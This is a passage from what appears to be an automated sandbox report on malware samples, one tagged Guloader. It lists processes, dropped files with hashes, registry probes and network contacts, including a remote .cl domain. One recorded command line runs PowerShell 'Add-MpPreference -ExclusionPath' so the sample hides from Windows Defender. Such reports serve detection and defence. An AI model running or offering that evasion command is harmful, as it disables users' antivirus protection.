| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
memory/624-2-0x0000000000F30000-0x0000000001330000-memory.dmp
C:\Users\Admin\AppData\Local\phytographic\asset.exe
| MD5 | 432523c2a91f208ce00e9aa553c25883 |
| SHA1 | 00fc307df8d7970dc4ca4c9f786d025d1032aeee |
| SHA256 | a131f667cc1c8ab17777294ffc556a8b45dd726452ccc10d716daa39d256d3a6 |
| SHA512 | 7a1e1f31b79bb9eff8a7463b7bb40aeb837584c990bce85b6189c07597c6bc12e17fecd1c09f53b163640b9f5e36cf6968c19499a7bf8a6d9210c9523361b31d |
C:\Users\Admin\AppData\Local\Temp\pyogenesis
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4400-10-0x00000000014F0000-0x00000000018F0000-memory.dmp
memory/3940-12-0x0000000000400000-0x0000000000447000-memory.dmp
memory/3940-13-0x0000000001400000-0x000000000174C000-memory.dmp
memory/3940-14-0x0000000000400000-0x0000000000447000-memory.dmp
memory/3940-15-0x0000000000400000-0x0000000000447000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
16s
Max time network
145s
Command Line
Signatures
Guloader family
Guloader,Cloudeye
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Common Files\customization.rom | C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\resources\primy.ini | C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe
"C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe"
C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe
"C:\Users\Admin\AppData\Local\Temp\102924_5830760.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | comercializadoradeinsumos.cl | udp |
| US | 162.240.106.189:443 | comercializadoradeinsumos.cl | tcp |
| US | 8.8.8.8:53 | 189.106.240.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
C:\Windows\Resources\primy.ini
| MD5 | 76d9175a3db7407eb0bfc3c07ddcd9d2 |
| SHA1 | 72071127e9a44935cb02650ed715ccaf6a8f8418 |
| SHA256 | 1f7119996dd17af05bf05e497104715bbbc3909676afa4329fbd59502be1a1a5 |
| SHA512 | 5032dab71e70a4bd1dad2f5cf9380e0097be7993bc46886fed6e4bdd8781f2b10d31338d90d0dc5804665bda2cbfe93f1172250e1a8ab7c9118baf9f156e3c69 |
C:\Users\Admin\AppData\Local\Temp\nsi739B.tmp\System.dll
| MD5 | 192639861e3dc2dc5c08bb8f8c7260d5 |
| SHA1 | 58d30e460609e22fa0098bc27d928b689ef9af78 |
| SHA256 | 23d618a0293c78ce00f7c6e6dd8b8923621da7dd1f63a070163ef4c0ec3033d6 |
| SHA512 | 6e573d8b2ef6ed719e271fd0b2fd9cd451f61fc9a9459330108d6d7a65a0f64016303318cad787aa1d5334ba670d8f1c7c13074e1be550b4a316963ecc465cdc |
memory/896-23237-0x0000000003830000-0x00000000045E5000-memory.dmp
memory/896-23238-0x00000000771A1000-0x00000000772C1000-memory.dmp
memory/896-23239-0x0000000073E45000-0x0000000073E46000-memory.dmp
memory/896-23240-0x0000000003830000-0x00000000045E5000-memory.dmp
memory/2988-23241-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23242-0x0000000001660000-0x0000000002415000-memory.dmp
memory/2988-23243-0x0000000077228000-0x0000000077229000-memory.dmp
memory/2988-23244-0x0000000077245000-0x0000000077246000-memory.dmp
memory/2988-23248-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23249-0x0000000000401000-0x0000000000404000-memory.dmp
memory/2988-23250-0x0000000001660000-0x0000000002415000-memory.dmp
memory/2988-23252-0x00000000771A1000-0x00000000772C1000-memory.dmp
memory/2988-23251-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23253-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23254-0x0000000000401000-0x0000000000404000-memory.dmp
memory/2988-23255-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23256-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23257-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23261-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23262-0x0000000000401000-0x0000000000404000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
98s
Max time network
145s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1040 set thread context of 2916 | N/A | C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe | C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe
"C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe"
C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe
"C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/1040-0-0x00000000752CE000-0x00000000752CF000-memory.dmp
memory/1040-1-0x0000000000830000-0x00000000008EA000-memory.dmp
memory/1040-2-0x0000000005900000-0x0000000005EA6000-memory.dmp
memory/1040-3-0x0000000005350000-0x00000000053E2000-memory.dmp
memory/1040-4-0x00000000053F0000-0x0000000005747000-memory.dmp
memory/1040-5-0x00000000752C0000-0x0000000075A71000-memory.dmp
memory/1040-6-0x0000000005310000-0x000000000531A000-memory.dmp
memory/1040-7-0x0000000005850000-0x00000000058EC000-memory.dmp
memory/1040-8-0x0000000005820000-0x000000000583C000-memory.dmp
memory/1040-9-0x00000000752CE000-0x00000000752CF000-memory.dmp
memory/1040-10-0x00000000752C0000-0x0000000075A71000-memory.dmp
memory/1040-11-0x0000000007B50000-0x0000000007BDE000-memory.dmp
memory/2916-12-0x0000000000400000-0x0000000000447000-memory.dmp
memory/2916-14-0x0000000000400000-0x0000000000447000-memory.dmp
memory/1040-15-0x00000000752C0000-0x0000000075A71000-memory.dmp
memory/4480-16-0x000000007534E000-0x000000007534F000-memory.dmp
memory/4480-18-0x0000000075340000-0x0000000075AF1000-memory.dmp
memory/4480-17-0x0000000002420000-0x0000000002456000-memory.dmp
memory/4480-20-0x00000000051C0000-0x000000000588A000-memory.dmp
memory/4480-19-0x0000000075340000-0x0000000075AF1000-memory.dmp
memory/4480-21-0x0000000004D80000-0x0000000004DA2000-memory.dmp
memory/4480-23-0x00000000050C0000-0x0000000005126000-memory.dmp
memory/4480-22-0x0000000004F20000-0x0000000004F86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3wqjvvf1.dsh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4480-33-0x0000000005990000-0x0000000005CE7000-memory.dmp
memory/4480-34-0x0000000005DC0000-0x0000000005DDE000-memory.dmp
memory/4480-35-0x0000000005E00000-0x0000000005E4C000-memory.dmp
memory/4480-36-0x0000000006D90000-0x0000000006DC2000-memory.dmp
memory/4480-37-0x0000000071520000-0x000000007156C000-memory.dmp
memory/4480-48-0x0000000006FD0000-0x0000000006FEE000-memory.dmp
memory/4480-47-0x0000000075340000-0x0000000075AF1000-memory.dmp
memory/4480-49-0x0000000006FF0000-0x0000000007093000-memory.dmp
memory/4480-50-0x0000000007770000-0x0000000007DEA000-memory.dmp
memory/4480-51-0x0000000007120000-0x000000000713A000-memory.dmp
memory/4480-52-0x0000000007190000-0x000000000719A000-memory.dmp
memory/4480-53-0x0000000007390000-0x0000000007426000-memory.dmp
memory/4480-56-0x0000000075340000-0x0000000075AF1000-memory.dmp
memory/2916-57-0x0000000000400000-0x0000000000447000-memory.dmp
memory/2916-58-0x00000000011E0000-0x000000000152C000-memory.dmp
memory/2916-59-0x0000000000400000-0x0000000000447000-memory.dmp